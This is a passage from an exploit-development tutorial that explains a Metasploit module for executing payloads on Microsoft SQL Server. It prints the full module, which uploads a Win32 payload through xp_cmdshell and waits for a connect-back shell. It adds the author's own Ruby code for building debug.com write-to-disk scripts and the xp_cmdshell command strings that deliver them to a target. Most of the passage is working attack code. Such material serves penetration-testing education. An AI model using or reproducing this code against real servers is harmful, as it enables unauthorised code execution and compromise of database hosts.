One caveat: I didn't need to split these commands across three different files. If you think ahead, though, you may want to reuse code, and putting the hex2binary portions in mssql.rb made the most sense. Plus, HDM is a stickler for pretty code (love you buddy).
Let's first take a look at mssql_payload.rb to get an idea of what we're looking at here.
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  # Pulls in the MSSQL helpers (login, queries, xp_cmdshell, upload) from mssql.rb
  include Msf::Exploit::Remote::MSSQL

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft SQL Server Payload Execution',
      'Description'    => %q{
        This module will execute an arbitrary payload on a Microsoft SQL
        Server, using the Windows debug.com method for writing an executable
        to disk and the xp_cmdshell stored procedure. File size restrictions
        are avoided by incorporating the debug bypass method presented at
        Defcon 17 by SecureState. Note that this module will leave a metasploit
        payload in the Windows System32 directory which must be manually deleted
        once the attack is completed.
      },
      'Author'         => [ 'David Kennedy "ReL1K"' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 7236 $',
      'References'     =>
        [
          [ 'OSVDB', '557'],
          [ 'CVE', '2000-0402'],
          [ 'BID', '1281'],
          [ 'URL', 'http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf'],
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0
    ))
  end

  def exploit
    debug = false # enable to see the output

    # Authenticate with the USERNAME/PASSWORD from the datastore; nothing else works without a session
    if(not mssql_login_datastore)
      print_status("Invalid SQL Server credentials")
      return
    end

    # Wrap the encoded payload in a Win32 PE, push it to disk through xp_cmdshell and run it
    mssql_upload_exec(Msf::Util::EXE.to_win32pe(framework,payload.encoded), debug)

    handler     # wait for the payload to connect back
    disconnect  # close the connection to the SQL Server
  end

end
```
While this may seem extremely simple and not a lot of code, there is quite a bit going on behind the scenes that we'll investigate later. Let's break down this file for now. The top half should look familiar. The References section simply holds additional information about the attack or the original exploit vector. 'Platform' => 'win' restricts the module to Windows payloads, and 'Targets' is where we would add entries if the exploit had to behave differently per target; in this example we could add separate entries for SQL Server 2000, 2005 and 2008. 'DefaultTarget' is an index into that Targets array and selects the entry used when the user doesn't pick one. If we listed 2000, 2005 and 2008 and wanted 2005 as the default, we would set DefaultTarget to 1; users could still choose another with set TARGET 0 or set TARGET 2, but if they didn't, 2005 would be the system attacked.
Moving to "def exploit": this is where the actual exploit code begins. Note that at the very top of the file we included Msf::Exploit::Remote::MSSQL. This mixin gives the exploit a set of helper methods it can call directly (login, query execution, xp_cmdshell, upload); they live in mssql.rb under lib/msf/core/exploit/.
The first line, debug = false, controls whether those helpers print what they are doing back to the Metasploit user. Normally we don't want that, since it produces a lot of output, but if something isn't working, change it to debug = true and you'll see every command sent and every response received. The check that follows, mssql_login_datastore, authenticates to the SQL Server with the USERNAME and PASSWORD from the datastore; if the login fails the module prints a message and returns, because nothing else can work without a session. The next line is the most complex part of the entire attack: this one-liner pulls in many lines of code from mssql.rb. We'll look inside it shortly, but here is what is actually there:
mssql_upload_exec: a function defined in mssql.rb that uploads an executable to the underlying operating system through SQL (echoing it to disk via xp_cmdshell) and then runs it.
Msf::Util::EXE.to_win32pe(framework, payload.encoded): takes the payload you selected, already encoded with the default encoder (that is what payload.encoded gives you), and wraps it in a Win32 PE executable; this is the file that gets uploaded.
debug: the second argument simply passes along the flag set at the top of the method, so mssql_upload_exec knows whether to print the commands it runs and their output.
Lastly, handler starts the payload handler in the background, so that when the uploaded executable runs and the payload connects back, Metasploit is ready to accept the session.
disconnect closes the connection to the MSSQL server.
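To make the upload step concrete, here is an added example (my own code, not the module's and not mssql.rb): it builds the debug.com script that writes a given byte string to disk, models what debug does with that script so it can be checked offline before anything touches a target, and turns it into the xp_cmdshell calls that would deliver it one echo at a time. The DebugUpload name, the %TEMP% scratch file and the EXEC master..xp_cmdshell form are assumptions, as is a 32-bit Windows target that still ships debug.exe and has xp_cmdshell enabled.

```ruby
# Added example, not Metasploit code: the debug.com write-to-disk trick and the
# xp_cmdshell command list that delivers it.  Names and paths are assumptions.
require 'securerandom'

module DebugUpload
  LOAD_OFFSET = 0x100                  # debug loads and writes the file at DS:0100
  MAX_WRITE   = 0x10000 - LOAD_OFFSET  # one real-mode segment minus that offset
  BYTES_PER_E = 16                     # bytes per "e" line, keeps each echo short

  # Build a debug.com script that writes +data+ to +filename+ (an 8.3 name).
  # On the target this is what "debug < script.txt" consumes.
  def self.script(data, filename)
    data = data.b
    raise ArgumentError, "debug can write at most #{MAX_WRITE} bytes" if data.bytesize > MAX_WRITE
    unless filename =~ /\A[A-Za-z0-9_]{1,8}(\.[A-Za-z0-9]{1,3})?\z/
      raise ArgumentError, "debug expects an 8.3 filename"
    end
    lines = ["n #{filename}"]                # n = name the output file
    data.bytes.each_slice(BYTES_PER_E).with_index do |chunk, i|
      hex = chunk.map { |b| format("%02x", b) }.join(" ")
      lines << format("e %04x %s", LOAD_OFFSET + i * BYTES_PER_E, hex)  # e = enter bytes
    end
    lines << "rcx"                           # set register CX ...
    lines << format("%x", data.bytesize)     # ... to the byte count, entered in hex
    lines << "w"                             # write CX bytes from DS:0100 to the file
    lines << "q"
    lines.join("\r\n") + "\r\n"
  end

  # Model of what debug.exe does with the script: returns the bytes it would
  # write.  Lets us confirm the script round-trips before it is sent anywhere.
  def self.simulate(script)
    mem = {}
    count = nil
    expect_cx = false
    script.each_line(chomp: true) do |raw|
      line = raw.sub(/\r\z/, '').strip       # echo on the target leaves a trailing space
      if expect_cx
        count = line.to_i(16)
        expect_cx = false
      elsif line =~ /\Ae ([0-9a-f]+) (.+)\z/i
        addr = $1.to_i(16)
        $2.split.each_with_index { |h, j| mem[addr + j] = h.to_i(16) }
      elsif line.casecmp?("rcx")
        expect_cx = true
      end
    end
    raise "script never set CX" unless count
    (0...count).map { |i| mem.fetch(LOAD_OFFSET + i, 0) }.pack("C*")
  end

  # Escape a string for a single-quoted T-SQL literal.
  def self.tsql_quote(s)
    "'" + s.gsub("'", "''") + "'"
  end

  # The xp_cmdshell calls that append the script line by line into +tmp+ on the
  # target, feed it to debug, and remove the script again.
  def self.xp_cmdshell_commands(script, tmp = "%TEMP%\\#{SecureRandom.hex(4)}.txt")
    cmds = script.each_line(chomp: true).map do |raw|
      line = raw.sub(/\r\z/, '')
      # Script lines are plain text; refuse anything cmd.exe would interpret.
      raise ArgumentError, "shell metacharacter in #{line.inspect}" if line =~ /[&|<>^%"]/
      # The space before >> matters: a line ending in a digit followed directly
      # by >> (e.g. "... 02>>") is read by cmd.exe as a handle redirect.
      "EXEC master..xp_cmdshell #{tsql_quote("cmd.exe /c echo #{line} >>#{tmp}")}"
    end
    cmds << "EXEC master..xp_cmdshell #{tsql_quote("cmd.exe /c debug<#{tmp}")}"
    cmds << "EXEC master..xp_cmdshell #{tsql_quote("cmd.exe /c del #{tmp}")}"
  end
end
```

The ceiling enforced in script is the "file size restriction" the module description mentions: debug can only fill one 64 KB segment, so a full Metasploit executable will not fit. The SecureState bypass gets around it by writing a tiny hex-to-binary converter this way and then echoing the real payload as hex for that converter to decode, which is what the hex2binary code in mssql.rb is for. Inside a module each command string would be sent through the mixin's xp_cmdshell helper with the debug flag rather than collected into an array, but the strings themselves are the same.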
Now that we have walked through this portion, we will break down the next section in mssql.rb to find out exactly what this attack is doing.